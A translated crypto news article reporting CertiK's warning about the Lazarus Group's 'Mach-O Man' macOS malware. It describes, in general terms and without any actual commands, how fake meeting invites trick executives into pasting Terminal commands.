Apple Mac users beware! North Korean hackers Lazarus launch new malware "Mach-O Man": One action to take over your computer

📄Full Article· Automatically extracted by trafilaturaGemini 翻譯1607 words

Mac users, sound the security alarm! The North Korean hacker organization Lazarus Group has released a brand-new piece of malware targeting Apple systems called "Mach-O Man." Hackers pose as business partners to send fake video conferencing links, tricking executives into pasting a "fix connection" command into their Terminal, thereby instantly gaining control of the system and draining assets. According to a warning from CertiK, Lazarus has frantically stolen over $500 million in the past two weeks, and the entire crypto industry should view them as a major state-sponsored threat. (Previous coverage: North Korean hackers get counter-hacked! ZachXBT exposes internal payment server data: fake engineers earning millions of USD per month, password was 123456) (Background: How to spot a North Korean hacker in one second? Interviewer asks them to "curse Kim Jong Un," fake Japanese engineer panics and blows their cover) The most notorious state-sponsored North Korean hacker organization in the crypto world, Lazarus Group, is launching fierce attacks against Web3 corporate executives with a brand-new weapon tailored for Apple users. According to the latest warning from blockchain security firm CertiK, Lazarus Group is running a new attack campaign dubbed "Mach-O Man." This campaign cleverly turns daily business communication into a direct pipeline for stealing confidential credentials and causing massive financial losses. Since 2017, the estimated cumulative funds stolen by Lazarus Group have reached as high as $6.7 billion. Their recent attack frequency is staggering. CertiK senior blockchain security researcher Natalie Newson pointed out that in the past two weeks alone, these North Korean hackers successfully siphoned off over $500 million in assets through attacks targeting DeFi protocols Drift and KelpDAO. "What makes Lazarus particularly dangerous right now is their 'level of activity.' KelpDAO, Drift, and now this brand-new macOS malware suite—all of this has happened within the same month. This is not random hacking; it is a state-sponsored financial operation with institutional-level scale and speed." She further explained that "Mach-O Man" is a modular macOS malware suite created by the notorious Chollima unit under Lazarus. It uses native Mach-O binaries specifically tailored for the Apple system environment widely used in the cryptocurrency and fintech sectors. This hacking tool is difficult to defend against because it employs a social engineering delivery method known as "ClickFix." Threat intelligence firm BCA Ltd founder Mauro Eldritch and CertiK experts detailed the attack flow: - Sending urgent invitations: Hackers send "urgent" business meeting invitations (via Zoom, Microsoft Teams, or Google Meet) to corporate executives through messaging apps like Telegram. - Fake websites and fake errors: After clicking the link, victims are directed to a realistic-looking fake website that displays a prompt claiming a need to "fix a connection issue." - Tricking victims into copying commands: The website instructs victims to copy a seemingly simple command and paste it into their Mac's "Terminal" to execute. - Total compromise: Once the victim inputs and executes the command themselves, hackers immediately gain access to corporate systems, SaaS platforms, and financial resources. Additionally, security researcher Vladimir S. pointed out that there are other variants of this attack. For example, hackers hijack DeFi project domains and replace the site with a forged Cloudflare verification page, similarly requiring victims to enter Terminal commands to "grant access." Newson warned: "The page looks real, the instructions look normal, and the action is initiated by the victim 'themselves'—this is why traditional security controls often miss it." Even more terrifying, Mach-O Man possesses extreme stealth. Most victims do not realize their security perimeter has been breached until their funds have been completely drained. By then, the malware has usually "self-deleted" to cover its tracks, leaving victims unable to even determine which variant of the virus they were infected with. BlockTempo strongly urges all crypto practitioners never to execute any unknown scripts in the Terminal.

Data Status✓ Full text extractedRead Original (動區 BlockTempo)

🔍Historical Similar Events· Keyword + Asset Matching3 items

2026-04-22

Mach-O Man Malware Steals macOS Keychain Data in Lazarus Group Crypto Campaign

Similarity 180%關鍵字 mach/man/lazarus

2026-04-22

Lazarus Group has become especially dangerous with new Mach-O Man attack: CertiK

Similarity 180%關鍵字 mach/man/lazarus

2026-04-20

LayerZero Pins $292M KelpDAO Bridge Hack on North Korea’s Lazarus Group

Similarity 120%關鍵字 lazarus同分類 hot

💡 Currently matching via keywords + symbols (MVP) · Will be upgraded to embedding semantic search later